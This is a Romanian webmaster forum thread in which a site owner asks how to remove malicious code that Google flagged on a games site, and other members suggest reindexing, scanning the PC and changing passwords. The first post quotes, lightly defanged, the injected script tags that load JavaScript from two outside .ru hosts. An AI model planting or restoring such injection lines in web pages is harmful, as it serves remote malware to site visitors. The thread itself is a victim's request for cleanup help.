Cod dăunător

Discutii si ultimele stiri despre Google, PageRank, Indexare, AdWords, AdSense, GoogleBot, Blogger, Picasa, Google Sitemap, Gmail, Google+, Analytics, Product Search, Webmaster Tools

Moderator: Moderatori

sweetamber
Average Member
Mesaje: 127
Membru din: Dum Dec 27, 2009 1:26 pm

Cod dăunător

Mesajde sweetamber » Lun Oct 11, 2010 12:33 am

Din nefericire, Google a descoperit cod dăunător pe site-ul meu de jocuri Jocuri. De fapt 2
Aceste coduri sunt urmatoarele:

<script type=??"text/??javascript" src="h..p://??tartstack.ru/CD.js"></script>
<!--875928f327b49886f295952dacd9745a-->

document ??write('<sc'+'ript type="text/??javascript" src="h..p:// ??greatrow.ru/CD.js"></scri'+'pt>');


fara semnele de intrebare (??) si cu http in loc de h..p

Problema este ca am eliminat aceste coduri din continut (le-am gasit de vreo 7-8 ori) dar google imi spune ca ele exista in continuare.
Are cineva idee unde ar mai trebui cautate?
Multumesc



Avatar utilizator
Birkoff
Senior Member
Mesaje: 6380
Membru din: Joi Mar 18, 2004 2:34 pm
Localitate: Bucuresti
Contact:

Mesajde Birkoff » Lun Oct 11, 2010 2:12 am

1) CMS, ERP, CRM, etc... (doar pentru clienti))
2) Portofoliu, servicii, contact, blog
3) Folositi aceasta clasa sql in proiectele voastre (open source)
4) Vrei un magazin virtual la cheie, usor de folosit, cu api-uri incluse pentru maximizarea vanzarilor si multe alte facilitati? Da un semn si discutam.

sweetamber
Average Member
Mesaje: 127
Membru din: Dum Dec 27, 2009 1:26 pm

Mesajde sweetamber » Lun Oct 11, 2010 9:08 pm

Din pacate nu pot instala programul de care spui la punctul 3. Multumesc pentru interesul acordat.

Avatar utilizator
Sim Master
Average Member
Mesaje: 189
Membru din: Dum Aug 22, 2010 4:31 pm
Localitate: Timisoara
Contact:

Mesajde Sim Master » Lun Oct 11, 2010 9:30 pm

probabil ar trebui sa astepti ca google sa indexeze din nou pagina ta si sa se asigure ca nu mai ai virusi

daca nu ma insala memoria parca era o pagina de-a lu' google in care puteai posta linkul sitului tau dupa ce l-ai curatat de virusi

sweetamber
Average Member
Mesaje: 127
Membru din: Dum Dec 27, 2009 1:26 pm

Mesajde sweetamber » Mar Oct 12, 2010 12:11 am

Sim Master scrie:probabil ar trebui sa astepti ca google sa indexeze din nou pagina ta si sa se asigure ca nu mai ai virusi

daca nu ma insala memoria parca era o pagina de-a lu' google in care puteai posta linkul sitului tau dupa ce l-ai curatat de virusi


In contul meu de la Google pot solicita sa imi revizuiasca site-ul. Am scos codurile pe care mi le indica, am solicitat revizuire, dar imi spune ca sunt in continuare acolo. Adica exact aceleasi coduri pe care mi le indica prima data, mi le indica si a doua oara ( in aceeasi locatie). Ideea este ca imi spune ca sunt in http://www.ejocuripegratis.ro/, fara a da o locatie exacta.

Un alt aspect la care ma mai gandesc si in legatura cu care as vrea sa va cer parerea , este faptul ca pe acest site, persoanele inregistrate pot lasa comentarii. Credeti ca aceste coduri puteau fi puse in aceste comentarii?
Daca da, ce ar trebui sa fac pentru ca user-ii sa nu poata pune coduri, ci doar mesaje simple?

alexandru_24
Senior Member
Mesaje: 261
Membru din: Mar Iul 11, 2006 11:27 am
Localitate: Bucuresti
Contact:

Mesajde alexandru_24 » Mar Oct 12, 2010 1:12 pm

Cu ceva timp in urma am avut exact aceeasi problema. Rezolvarea?

Scoate toate acele bube din paginile infectate
Cauti cu google ccleaner, il instalezi si rulezi
Schimbi toate parolele ftp, mysql, etc... (recomandat dupa ce rulezi ccleaner)

Daca nu vei curata calculatorul si nu vei schimba parolele, o sa fi infectat tot resul vietii. Exact asta face virusul pe care-l ai, citeste parolele :)

Iti garantez ca daca vei parcurge pasii de mai sus, vei scapa de probleme.

Succes.
am un magazin online de baterii laptop www.baterii-laptop.com.ro si unul de gadgeturi, accesorii telefoane mobile, etc... www.abshop.ro


Înapoi la “Google”

Cine este conectat

Utilizatori ce ce navighează pe acest forum: Niciun utilizator înregistrat și 3 vizitatori